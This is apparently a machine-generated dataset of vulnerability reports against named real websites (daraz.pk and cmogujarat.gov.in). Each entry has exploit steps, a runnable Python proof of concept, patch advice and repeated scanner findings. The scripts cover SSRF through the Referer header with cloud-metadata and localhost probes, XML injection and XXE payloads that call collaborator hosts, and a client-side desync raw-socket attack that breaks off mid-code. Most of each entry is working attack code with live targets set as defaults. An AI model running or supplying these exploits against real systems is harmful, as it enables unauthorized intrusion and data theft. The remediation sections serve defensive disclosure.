"exploit_steps": "## Reconnaissance\n1. Identified that the `Referer` HTTP header on `https://www.daraz.pk/cart/` is reflected in server-side HTTP requests.\n2. Confirmed that arbitrary external domains can be targeted via this header.\n\n## Vulnerability Confirmation\n1. Submitted a payload containing a Burp Collaborator URL (`http://xpqjht2lx4d5bl7mkmejw3dwcnih6du3iy5pte.oastify.com/`) in the `Referer` header.\n2. Observed an HTTP request made by the server to the Collaborator domain, confirming SSRF capability.\n\n## Exploitation Steps\n1. Craft a malicious HTTP request targeting internal services or public endpoints via the `Referer` header.\n2. Submit the request to `https://www.daraz.pk/cart/` with the malicious `Referer` header.\n3. Observe server-side interaction with the specified endpoint.\n4. Use this behavior to probe internal infrastructure or access localhost-only services if applicable.\n\n## Impact\nAn attacker can leverage this SSRF to:\n- Scan internal networks inaccessible externally.\n- Interact with internal services such as metadata endpoints (e.g., cloud instance metadata).\n- Bypass firewall rules by using the server as a proxy.",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: Server-Side Request Forgery via Referer Header\nTarget: https://www.daraz.pk/cart/\nVulnerability: Referer header value used in server-side HTTP requests without validation\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport time\n\nDEFAULT_TARGET = \"https://www.daraz.pk/cart/\"\nCOLLABORATOR_URL = \"http://your-collaborator.oastify.com/callback\"\n\ndef test_ssrf_via_referer(target_url: str, callback_url: str):\n \"\"\"\n Test SSRF by injecting callback URL in Referer header.\n Monitor for out-of-band interaction.\n \"\"\"\n print(f\"[*] Target Endpoint: {target_url}\")\n print(f\"[*] Callback URL (OAST): {callback_url}\")\n print(f\"[*] Sending request with malicious Referer header...\")\n print(\"-\" * 60)\n headers = {\n \"Referer\": callback_url,\n \"User-Agent\": \"Mozilla/5.0 (PoC-SSRF-Test)\",\n \"Connection\": \"close\"\n }\n try:\n start_time = time.time()\n response = requests.get(\n target_url,\n headers=headers,\n timeout=20,\n allow_redirects=True\n )\n elapsed = time.time() - start_time\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Time: {elapsed:.2f}s\")\n print(f\"[+] Response Size: {len(response.content)} bytes\")\n if response.headers.get(\"Server\") or response.headers.get(\"X-Powered-By\"):\n print(f\"[+] Server Header: {response.headers.get('Server', 'N/A')}\")\n print(\"\\n[!] IMPORTANT: Monitor your OAST/collaborator dashboard for:\")\n print(f\" • HTTP GET request to: {callback_url}\")\n print(f\" • Source IP should be the TARGET SERVER\")\n print(f\" • User-Agent may show application signature\")\n print(\"\\n[!] 
Advanced Payloads (for authorized testing only):\")\n print(f\" • Internal IP: http://169.254.169.254/latest/meta-data/\")\n print(f\" • Localhost: http://127.0.0.1:8080/admin\")\n print(f\" • Port scan: http://internal-host:PORT/\")\n return True\n except requests.exceptions.Timeout:\n print(\"[!] Request timed out - server may be filtering outbound requests\")\n return False\n except requests.exceptions.RequestException as e:\n print(f\"[!] Request failed: {e}\")\n return False\n\ndef test_internal_probe(target_url: str, internal_target: str):\n \"\"\"\n Attempt to probe internal resources (AUTHORIZED TESTING ONLY).\n \"\"\"\n print(f\"\\n[*] Probing internal resource: {internal_target}\")\n headers = {\n \"Referer\": internal_target,\n \"User-Agent\": \"Mozilla/5.0 (PoC-Internal-Probe)\"\n }\n try:\n response = requests.get(target_url, headers=headers, timeout=15)\n internal_indicators = [\"EC2\", \"metadata\", \"root:\", \"password\", \"config\"]\n content_preview = response.text[:500].lower()\n if any(ind in content_preview for ind in internal_indicators):\n print(\"[!] POTENTIAL INTERNAL DATA LEAK DETECTED!\")\n print(f\"[+] Preview: {response.text[:200]}...\")\n return True\n else:\n print(\"[+] No obvious internal data in response\")\n return False\n except Exception as e:\n print(f\"[!] 
Probe failed: {e}\")\n return False\n\ndef main():\n parser = argparse.ArgumentParser(description=\"SSRF via Referer Header PoC - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target endpoint\")\n parser.add_argument(\"-c\", \"--callback\", required=True, help=\"Your OAST/collaborator URL\")\n parser.add_argument(\"-p\", \"--probe\", help=\"Internal URL to probe (optional)\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" * 70)\n print(\"SSRF PoC - Referer Header Injection\")\n print(\"Target: daraz.pk | Authorized Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n success = test_ssrf_via_referer(args.url, args.callback)\n if args.probe and success:\n test_internal_probe(args.url, args.probe)\n print(\"\\n[✓] PoC execution complete. Verify OAST logs for confirmation.\")\n sys.exit(0 if success else 1)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\nThe application processes the `Referer` HTTP header without validation and makes server-side HTTP requests to user-supplied URLs. This allows attackers to induce outbound requests to arbitrary domains.\n\n## Before/After Code Fix\n**Before:**\n```python\nreferer = request.headers.get('Referer')\nrequests.get(referer)\n```\n\n**After:**\n```python\nfrom urllib.parse import urlparse\n\nallowed_hosts = {'trusted-domain.com', 'another-trusted.com'}\nreferer = request.headers.get('Referer')\n\nif referer:\n parsed_url = urlparse(referer)\n if parsed_url.hostname in allowed_hosts:\n requests.get(referer)\n else:\n raise ValueError(\"Host not allowed\")\n```\n\n## Defense-in-Depth Checklist\n- [ ] Implement a strict allowlist of trusted domains for outbound requests.\n- [ ] Block access from the application server to internal IP ranges (e.g., 127.0.0.1, 10.x.x.x, 192.168.x.x).\n- [ ] Sanitize and validate all user-controllable input influencing network requests.\n- [ ] Log and monitor outbound requests originating from the application server.\n- [ ] Disable unnecessary protocols (e.g., file://, gopher://) in HTTP client libraries.\n- [ ] Restrict or disable redirect following in the outbound HTTP client, so that an allowlisted host cannot redirect the request to a non-allowlisted or internal address.\n\n## Verification Steps\n1. Resend the original request with a `Referer` pointing to a Collaborator URL.\n2. Confirm that no outbound request is made to the external domain.\n3. Verify that requests to allowlisted domains still function as expected.",
"context": "Severity: High (Certain)\nURL: https://www.daraz.pk/cart/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/cart/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/catalog/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/checkout/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/customer/ [name of an arbitrarily supplied URL parameter]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: 
https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path 
folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path 
folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [Referer HTTP header]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]\n\n---\n\nSeverity: High (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]"
},
{
"vulnerability": "XML injection",
"category": "injection",
"exploit_steps": "## Reconnaissance\\n1. Identified the target endpoint: `https://www.daraz.pk/cart/`\\n2. Observed that the application accepts user-controlled input in URL path segments.\\n\\n## Vulnerability Confirmation\\n1. Submitted a test payload containing XML metacharacters to the URL path folder parameter.\\n2. Used the payload:\\n```xml\\n<frd xmlns=\\\"http://a.b/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xsi:schemaLocation=\\\"http://a.b/ http://nri9jj4bzufvdb9cmcg9ytfmedk783w3k07qvf.oastify.com/frd.xsd\\\">frd</frd>\\n```\\n3. Detected interaction with the external domain (`oastify.com`), confirming that the server processes injected XML.\\n\\n## Exploitation Steps\\n1. Crafted malicious XML content referencing an attacker-controlled schema location.\\n2. Injected the payload via the vulnerable URL path segment.\\n3. Monitored for out-of-band interactions on the external domain to confirm successful injection.\\n4. Confirmed that the backend XML parser executed the injected content without proper sanitization.\\n\\n## Impact\\nThe vulnerability allows attackers to manipulate backend XML processing logic, potentially leading to unauthorized data access, service disruption, or further injection-based attacks like XXE.",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nPoC: XML Injection via URL Path Segment\nTarget: https://www.daraz.pk/cart/\nVulnerability: URL path segments incorporated into XML processing without sanitization\nDetection: Out-of-band interaction via XXE schema location\n\nAuthor: Security Researcher\nDate: 2026-04-22\n\"\"\"\n\nimport requests\nimport argparse\nimport sys\nimport urllib.parse\n\nDEFAULT_TARGET = \"https://www.daraz.pk/cart/\"\nOAST_DOMAIN = \"your-collaborator.oastify.com\"\n\ndef build_xxe_payload(oast_domain: str) -> str:\n \"\"\"\n Build XML injection payload with external schema reference for OAST detection.\n Uses xsi:schemaLocation to trigger outbound request.\n \"\"\"\n payload = (\n '<frd xmlns=\"http://a.b/\" '\n 'xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" '\n f'xsi:schemaLocation=\"http://a.b/ http://{oast_domain}/frd.xsd\">'\n 'frd</frd>'\n )\n return payload\n\ndef test_xml_injection(target_url: str, oast_domain: str, payload: str = None):\n \"\"\"\n Test XML injection via URL path segment.\n \"\"\"\n if payload is None:\n payload = build_xxe_payload(oast_domain)\n encoded_payload = urllib.parse.quote(payload, safe='')\n test_url = f\"{target_url.rstrip('/')}/{encoded_payload}\"\n print(f\"[*] Base Target: {target_url}\")\n print(f\"[*] OAST Domain: {oast_domain}\")\n print(f\"[*] Testing URL: {test_url[:100]}...\")\n print(\"-\" * 60)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (PoC-XML-Test)\",\n \"Accept\": \"application/xml, text/xml, */*\",\n \"Connection\": \"close\"\n }\n try:\n response = requests.get(test_url, headers=headers, timeout=20, allow_redirects=False)\n print(f\"[+] HTTP Status: {response.status_code}\")\n print(f\"[+] Response Length: {len(response.content)} bytes\")\n content_type = response.headers.get(\"Content-Type\", \"\")\n if \"xml\" in content_type.lower():\n print(f\"[!] 
Response Content-Type suggests XML processing: {content_type}\")\n error_patterns = [\"xml\", \"parse\", \"entity\", \"schema\", \"well-formed\"]\n response_text = response.text[:500].lower()\n if any(pattern in response_text for pattern in error_patterns):\n print(\"[!] Potential XML parsing error detected in response\")\n if args.verbose:\n print(f\" Preview: {response.text[:200]}\")\n print(\"\\n[!] IMPORTANT: Monitor your OAST dashboard for:\")\n print(f\" • HTTP request to: http://{oast_domain}/frd.xsd\")\n print(f\" • Method: GET | User-Agent may reveal backend XML parser\")\n print(f\" • Source IP: Should match target server infrastructure\")\n print(\"\\n[!] Payload Breakdown:\")\n print(f\" • Element: <frd>\")\n print(f\" • Namespace: http://a.b/\")\n print(f\" • Schema Location: http://{oast_domain}/frd.xsd\")\n print(f\" • Goal: Trigger outbound HTTP request via XML parser\")\n return True\n except requests.exceptions.Timeout:\n print(\"[!] Request timed out\")\n return False\n except requests.exceptions.RequestException as e:\n print(f\"[!] 
Request failed: {e}\")\n return False\n\ndef test_alternative_payloads(target_url: str, oast_domain: str):\n \"\"\"\n Test alternative XML injection vectors.\n \"\"\"\n payloads = [\n f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://{oast_domain}/xxe\">]><foo>&xxe;</foo>',\n f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://{oast_domain}/payload.dtd\"> %xxe;]>',\n f'<?xml-stylesheet type=\"text/xml\" href=\"http://{oast_domain}/style.xsl\"?>',\n ]\n print(f\"\\n[*] Testing {len(payloads)} alternative XML payloads...\")\n for i, payload in enumerate(payloads, 1):\n encoded = urllib.parse.quote(payload, safe='')\n test_url = f\"{target_url.rstrip('/')}/{encoded}\"\n try:\n resp = requests.get(test_url, timeout=10, headers={\"User-Agent\": \"PoC\"})\n print(f\" [{i}] Status: {resp.status_code} | Len: {len(resp.content)}\")\n except:\n print(f\" [{i}] Failed to send\")\n\ndef main():\n global args\n parser = argparse.ArgumentParser(description=\"XML Injection PoC via URL Path - daraz.pk\")\n parser.add_argument(\"-u\", \"--url\", default=DEFAULT_TARGET, help=\"Target base URL\")\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Your OAST/collaborator domain\")\n parser.add_argument(\"-p\", \"--payload\", help=\"Custom XML payload (optional)\")\n parser.add_argument(\"-a\", \"--alternatives\", action=\"store_true\", help=\"Test alternative payloads\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Verbose output\")\n args = parser.parse_args()\n if not args.url.startswith((\"http://\", \"https://\")):\n args.url = \"https://\" + args.url\n print(\"=\" * 70)\n print(\"XML Injection PoC - URL Path Segment\")\n print(\"Target: daraz.pk | Authorized Testing Only\")\n print(\"=\" * 70 + \"\\n\")\n success = test_xml_injection(args.url, args.domain, args.payload)\n if args.alternatives and success:\n test_alternative_payloads(args.url, args.domain)\n print(\"\\n[✓] PoC execution complete. 
Verify OAST logs for XML parser interactions.\")\n print(\"[!] Remediation: Disable external entity resolution in XML parsers.\")\n sys.exit(0 if success else 1)\n\nif __name__ == \"__main__\":\n main()",
"patch_code": "## Root Cause\\nThe application incorporates unsanitized user input directly into XML documents or messages processed by the backend. Specifically, the URL path segment is used without validation or encoding, allowing attackers to inject arbitrary XML structures.\\n\\n## Before / After Fix\\n### Before\\n```python\\nurl_segment = user_input # Direct usage of untrusted input\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n### After\\n```python\\nimport html\\nurl_segment = html.escape(user_input) # Encode special XML characters\\nrequests.get(f\\\"https://www.daraz.pk/cart/{url_segment}\\\")\\n```\\n\\n## Defense-in-Depth Checklist\\n- [ ] Validate all inputs against strict allowlists.\\n- [ ] Sanitize special characters (<, >, &, \\\", ') using entity encoding.\\n- [ ] Disable external entity resolution in XML parsers.\\n- [ ] Use secure XML parsing libraries with built-in protections.\\n- [ ] Implement WAF rules to detect XML metacharacter patterns.\\n\\n## Verification Steps\\n1. Re-submit the original XML injection payload.\\n2. Confirm that the payload is either rejected or safely encoded, and that no out-of-band request reaches the external domain.\\n3. Monitor logs for blocked or sanitized input attempts.\\n4. Perform regression testing to ensure functionality remains intact.",
"context": "Severity: Medium (Certain)\nURL: https://www.daraz.pk/cart/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/catalog/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/checkout/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/customer/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/robots.txt [URL path filename]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wangpu/ [URL path folder 1]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-2020-Live/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 5]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/12_12_2020/12-12-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: 
https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 3]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 4]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-coming-soon/ [URL path folder 7]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 2]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 6]\n\n---\n\nSeverity: Medium (Certain)\nURL: https://www.daraz.pk/wow/gcp/daraz/megascenario/pk/pakistanday2021/pakistan-day-sale-2021-live/ [URL path folder 7]"
}
]
|
|
69f1680b59a6632dae07de79
|
2026-04-29T02:08:11.383447+00:00
|
[
{
"vulnerability": "Client-side desync",
"category": "miscellaneous",
"exploit_steps": "## Reconnaissance\n1. Identified the target endpoint as `https://cmogujarat.gov.in/en`.\n2. Observed that the server supports HTTP/1.1 with `Connection: keep-alive`, indicating potential for connection reuse.\n3. Noted that the server does not properly handle delayed POST request bodies, leading to desynchronization.\n\n## Vulnerability Confirmation\n1. Sent a POST request to `/en` with `Content-Length: 0` and delayed the actual body transmission.\n2. Confirmed that the server waits for the body but does not close the connection upon timeout.\n3. Verified that subsequent payloads are interpreted as new requests, confirming client-side desync behavior.\n\n## Exploitation Steps\n1. Craft a POST request with `Content-Length: 0` and withhold the body.\n2. Send the withheld body after a delay, causing it to be interpreted as a new HTTP request on the reused connection.\n3. Inject malicious content such as XSS payloads into the desynchronized request.\n4. Trick a victim's browser into reusing the connection (e.g., via a malicious link or iframe).\n5. The injected payload executes in the victim’s browser context, achieving XSS.\n\n## Impact\nSuccessful exploitation leads to client-side desynchronization, enabling XSS without direct user interaction beyond visiting a crafted page. This can result in session hijacking, defacement, or phishing.",
"exploit_code": "#!/usr/bin/env python3\n\"\"\"\nClient-Side Desync (CSD) Proof of Concept\nTarget: https://cmogujarat.gov.in\nVulnerability: CWE-444 - Inconsistent Interpretation of HTTP Requests\n\nAuthor: [Your Name/Organization]\nDate: [Date]\nPurpose: Responsible Security Research & Disclosure\n\nUSAGE:\n python3 csd_poc_cmogujarat.py --host cmogujarat.gov.in --probe UNIQUE_STRING\n\nNOTE: This script is NON-DESTRUCTIVE and uses a unique probe string for safe verification.\n\"\"\"\n\nimport socket\nimport ssl\nimport argparse\nimport sys\nimport random\nimport string\nimport time\nfrom urllib.parse import urlparse\n\n# ANSI color codes for output\nclass Colors:\n RED = '\\033[91m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n BLUE = '\\033[94m'\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\ndef generate_unique_probe(length=12):\n \"\"\"Generate a unique random probe string for safe testing\"\"\"\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))\n\ndef create_socket(host, port, use_ssl=True):\n \"\"\"Create and return a connected socket\"\"\"\n if use_ssl:\n context = ssl.create_default_context()\n context.check_hostname = False\n context.verify_mode = ssl.CERT_NONE\n sock = context.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), server_hostname=host)\n else:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(10)\n sock.connect((host, port))\n return sock\n\ndef send_initial_post(sock, host, path, probe_marker):\n \"\"\"Send the initial POST request with Content-Length: 0\"\"\"\n request = (\n f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: Mozilla/5.0 (Security Research PoC)\\r\\n\"\n f\"Accept: text/html,application/xhtml+xml\\r\\n\"\n f\"Connection: keep-alive\\r\\n\"\n f\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n f\"Content-Length: 0\\r\\n\"\n f\"\\r\\n\"\n )\n print(f\"{Colors.BLUE}[+] Sending initial POST request with Content-Length: 
0{Colors.RESET}\")\n sock.sendall(request.encode())\n response = b\"\"\n try:\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n if b\"\\r\\n\\r\\n\" in response and len(response) > 1024:\n break\n except socket.timeout:\n print(f\"{Colors.YELLOW}[!] Timeout receiving initial response (expected behavior){Colors.RESET}\")\n return response.decode('utf-8', errors='ignore')\n\ndef send_desync_payload(sock, host, path, probe_string):\n \"\"\"Send the 'body' that the server will interpret as a NEW request\"\"\"\n desync_request = (\n f\"GET /{probe_string} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"User-Agent: CSD-PoC-Client\\r\\n\"\n f\"X-CSD-Test: {probe_string}\\r\\n\"\n f\"Connection: close\\r\\n\"\n f\"\\r\\n\"\n )\n print(f\"{Colors.BLUE}[+] Sending desync payload (will be interpreted as new request){Colors.RESET}\")\n sock.sendall(desync_request.encode())\n time.sleep(1)\n response = b\"\"\n try:\n sock.settimeout(5)\n while True:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n except socket.timeout:\n print(f\"{Colors.YELLOW}[!] Timeout reading desync response (may still be vulnerable){Colors.RESET}\")\n except Exception as e:\n print(f\"{Colors.YELLOW}[!] 
